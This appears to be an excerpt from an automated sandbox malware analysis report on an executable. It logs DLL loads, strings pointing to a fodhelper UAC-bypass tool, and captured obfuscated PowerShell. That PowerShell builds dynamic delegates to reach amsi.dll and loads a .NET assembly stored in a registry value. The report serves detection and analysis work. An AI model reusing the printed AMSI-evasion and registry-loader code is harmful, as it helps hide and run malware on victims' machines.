        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
        Source: e7WMhx18XN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: e7WMhx18XN.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
        Source: e7WMhx18XN.exeStatic file information: File size 8201216 > 1048576
        Source: e7WMhx18XN.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x7d1a00
        Source: e7WMhx18XN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1346529843.000000001C470000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp, FodhelperBypassUAC.exe, 0000000C.00000000.1323844842.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp, FodhelperBypassUAC.exe, 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: cwdC:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUACexeC:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.41.34120\bin\HostX64\x64\link.exepdbC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdbcmd /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: AC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_xfg_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\gs\amd64\amdsecgs.asmC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUAC\x64\Release\vc143.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($PQfPIIgelMLvUB,$ldjQKaGUcclhcmhFUiK).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$rcGSxwaaaaKUimwsu=$yNoIOiWMAQGoVU.Invoke
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+[Char](120)+'-'+[Char]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($scqjgRcUiQSTBu,$ivpgsCMtihnowdNIBeH).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+'.d'+'l'+''+[Char](108)+'');$EVtyXOreozsddqFlq=$xRDavNIGnzLLon.Invoke($Null,@([Object]$s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAcc
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+'x
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($VQjNvPkAQyhVaI,$vKwAkflJKGpUwNhZmaw).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+'l');$ZjZDXRvDVpnzBqGGH=$ONnlOWkAfaUoGE.Invo
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+'r'+[Char](98)+''+'x'+'-'+[Char](115)+'t
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($ViSGjgKFWHOvJi,$LYPstsFMvGDueCuqqFR).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'dll');$iERkOmaiRJGubWlVw=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$JKCdsPm,[Object
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'AR'+'E'+'').GetValue(''+'$'+''+[Char](114)+''+'b'+''+[Char](120)+''+'-'+''
        Obfuscated command line found
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output 